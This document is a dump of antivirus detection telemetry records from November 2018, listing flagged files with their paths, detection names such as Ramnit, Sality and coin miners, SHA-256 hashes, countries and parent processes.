  Row(detection=Row(filename='comms.dll', filepath='C:\\Users\\X\\Downloads\\Telegram Desktop\\FINGERPRINT\\SDK\\SDK VB 6 & Delphi\\comms.dll', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='b799ac02fd61704822e2891d776a400c49fff137b2c9f9bd517c872ce67843c8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe34_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe34 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T10:57:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-084648-f262a929', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1735652b\\AVSCAN-20181101-084513-DF755581\\AVSCAN-20181101-084648-F262A929', filesize=592000, name='PUA/DownloadGuide.Gen.#M1.#R1'), hash='b9d5f662834b2ab413e36aa56dc6b4a0f75cbaf69506bfd61652935700b3d92b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:46:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8ce8165e201c2d7c65f86abdff93485ff42062c7', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\8ce8165e201c2d7c65f86abdff93485ff42062c7', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='b0be44e3f6f1e5838252466506f690235c61d4e7600899f09140e3e580521f3d', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:05:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='esercizi vari.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\INFORMATICA\\ECDL\\Esercizi vari.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:24:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mylbotmslqts.bat', filepath='C:\\mylbotmslqts.bat', filesize=512000, name='TR/Taranis.2886.#M0.#R0'), hash='eeb30022f7c3503064471543d222174092dacb7e964ee1ea21f0c4fe8a60e3ec', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T03:29:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='3455.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\3455.tmp', filesize=896000, name='TR/Crypt.XPACK.Gen4.#M300.#R300219'), hash='f1fdf5a690618f86263b03a073592cd58c12fbca0354d113ecb97bdfe419cc72', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:35:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='operatore servizio mensa.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\ALIMENTARI\\OPERATORE SERVIZIO MENSA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:11:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=0, name='TR/Patched.Ren.Gen.#M2.#R3780'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:03:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='upgradedownload.exe', filepath='C:\\Users\\X\\Desktop\\Desktop\\Exmobile Software\\chat 3\\UpgradeDownload.exe', filesize=1536000, name='W32/Virut.Gen.#M1.#R1'), hash='ab15e9bc509d265560666e9663d7179f03ad0452e71c6d2c1eb75c9df0f03397', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T19:08:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\ilchxgjadly\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:44:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194418-39d3f906', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194418-39D3F906', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:44:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-204515-8158a535', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6c1aeb49\\AVSCAN-20181101-204500-7E53DB2A\\AVSCAN-20181101-204515-8158A535', filesize=256000, name='HEUR/AGEN.1019617.#M1.#R1'), hash='c4fd73aed6c56d4468b3ae01758909e82a2c5fcee022a8601dc3067725bf2f8d', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:45:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f0fbe6e96bbd80acb1911e34b5c03f3f015d756b4052b8fc0ca465d88f3ab395', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\F0FBE6E96BBD80ACB1911E34B5C03F3F015D756B4052B8FC0CA465D88F3AB395', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f0fbe6e96bbd80acb1911e34b5c03f3f015d756b4052b8fc0ca465d88f3ab395', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:14:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a6fa7fd692370ea377d4160c24eb0fe28ae4306076ff6f9db56419e90db599be', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-17\\A6FA7FD692370EA377D4160C24EB0FE28AE4306076FF6F9DB56419E90DB599BE', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='a6fa7fd692370ea377d4160c24eb0fe28ae4306076ff6f9db56419e90db599be', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:15:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='settingsvideo.html', filepath='C:\\Program Files\\HTC\\HTC Sync Manager\\ui\\htmls\\SettingsVideo.html', filesize=380000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='b52377f63628ad151ea5eeb775b35b265dd57a1918a2a2b44ed8bdb52f353965', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=818264, timestamp='2018-11-01T23:38:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aef866061c94bc3565c69964d30477942d9391ffb5392eae79d8e04067ba0772', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\AEF866061C94BC3565C69964D30477942D9391FFB5392EAE79D8E04067BA0772', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='aef866061c94bc3565c69964d30477942d9391ffb5392eae79d8e04067ba0772', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:28:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ospprearm.exe', filepath='C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\OSPPREARM.EXE', filesize=92000, name='TR/Patched.Ren.Gen.#M300.#R3374'), hash='bb711e346d631cec6e4f4581eff9ae4cfbe3a29d9eb3260e9c94c2bf565112be', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T05:31:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='88fae1e96a3a50e4887019be679f02427f6fcc329aeec819120eb69c0a24592c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\88FAE1E96A3A50E4887019BE679F02427F6FCC329AEEC819120EB69C0A24592C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='88fae1e96a3a50e4887019be679f02427f6fcc329aeec819120eb69c0a24592c', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:15:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='corsi formazione adulti.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:09:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yxagrwvf.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\YXAGRWVF.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='masper erik.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\STAGE 573160\\MASPER ERIK.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:27:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='E:\\Users\\X\\Desktop\\ZEN Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:07:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9359570\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\taskhost.exe', parentsize=49152, timestamp='2018-11-04T22:09:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='e.exe', filepath='C:\\PrоgramData\\E\\E.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:11:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k secsvcs', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T16:16:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:49:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-180814-e41baabc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56c5e92d\\AVSCAN-20181104-180654-D887D683\\AVSCAN-20181104-180814-E41BAABC', filesize=64000, name='HEUR/Macro.Downloader.APG.Gen.#M1.#R1'), hash='64d3a042cf29d9649d56b2f1aa18067cd10406a4e3e37d5cf12426160897e247', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T20:08:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-04T22:20:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0001ec79', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0001ec79', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:19:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='adjprog.exe', filepath='C:\\Users\\X\\Desktop\\caderno enel\\Reset Epson Serie L\\Todos os Resets\\Epson Adjustment Program Resetter L350-L355-L550-L555-L110-L210-L300\\Adjprog.exe', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M300.#R100738'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Total Security 19.0.0\\avp.exe', parentsize=619640, timestamp='2018-11-04T05:29:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-104603-f13bf607', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ab747340\\AVSCAN-20181104-104550-EF10721B\\AVSCAN-20181104-104603-F13BF607', filesize=1152000, name='TR/Black.Gen2.#M1.#R1'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T02:46:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-165356-4b14f69b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ebe48554\\AVSCAN-20181104-165143-387DDB14\\AVSCAN-20181104-165356-4B14F69B', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:53:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Downloads\\nhm_windows_1.9.0.4\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\nhm_windows_1.9.0.4\\NiceHashMinerLegacy.exe', parentsize=1464320, timestamp='2018-11-04T14:29:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210657-7637bcb4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-210657-7637BCB4', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:06:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-183323-79b29e57', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d544b39\\AVSCAN-20181104-183252-7620449B\\AVSCAN-20181104-183323-79B29E57', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='691faa6a61afde1cc8407028fbac875ff3501d10b2effd63df0026cd060f3d5c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:33:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T09:48:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-155552-8052100f', filepath='\\\\?\\C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77a591b5\\AVSCAN-20181104-155357-6E504C8E\\AVSCAN-20181104-155552-8052100F', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M300.#R100738'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:04:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-155045-47540c2d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cae01c7d\\AVSCAN-20181104-154448-138A7998\\AVSCAN-20181104-155045-47540C2D', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:20:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='190363-modpak-dlya-servera-yuzhnyy-park-v.4-global-update-gtasa.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp4_190363-modpak-dlya-servera-yuzhnyy-park-v.4-global-update-gtasa.zip\\190363-modpak-dlya-servera-yuzhnyy-park-v.4-global-update-gtasa.exe', filesize=201216000, name='PUA/GameModding.Gen.#M300.#R8103'), hash='41021171810614363affd62b2e3294269dd824fbf1a7022505358d31fd8aa793', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T16:39:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-093307-0ad9fce2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_52abe2b9\\AVSCAN-20181104-093215-03E2C08C\\AVSCAN-20181104-093307-0AD9FCE2', filesize=656000, name='HTML/ExpKit.Gen2.#M1.#R1'), hash='24a62d9c6398505911ae927f23b616458b4b7a4798a7949187d8f12c88ab1380', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T08:33:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-13-51-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T17:12:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T20:49:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-155046-b47ed510', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_db22258a\\AVSCAN-20181104-152714-31398C24\\AVSCAN-20181104-155046-B47ED510', filesize=3712000, name='TR/Crypt.ZPACK.Gen2.#M1.#R1'), hash='078e9a6ae1ed2b2ef178f7bbb12a0a04ba629e1fce6313436d1b806df237491c', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:50:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T19:43:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='zoomplayer.wmv.professional.v6.00.rc1-patch.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_ZoomPlayer_WMV_Professional_v6.00_RC1_by_FFF.zip\\zoomplayer.wmv.professional.v6.00.rc1-patch.exe', filesize=64000, name='TR/Small.64000.#M1.#R1'), hash='d50cdce3a431571c1d0bb6928fade49d2220bcc50802aedee002a0e2f7c09583', metadata=Row(cmdline=None, country='FI', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=23808, timestamp='2018-11-04T01:17:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T18:23:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-182616-795388c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d9006c36\\AVSCAN-20181104-182423-6D73F918\\AVSCAN-20181104-182616-795388C8', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='689f8d95752084794c09edc4d7e50c7347428fee74c9a37327343f1a517cdcd6', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T10:26:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-064827-48ac600d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6814c783\\AVSCAN-20181104-063216-B01377BC\\AVSCAN-20181104-064827-48AC600D', filesize=3584000, name='TR/Crypt.EPACK.Gen2.#M1.#R1'), hash='44b78ecff8902fbea0bf64454d8be5d3491cf285aef15af4898fefe00eb4cef8', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:48:27Z'), dt=datetime.date(2018, 11, 4)),
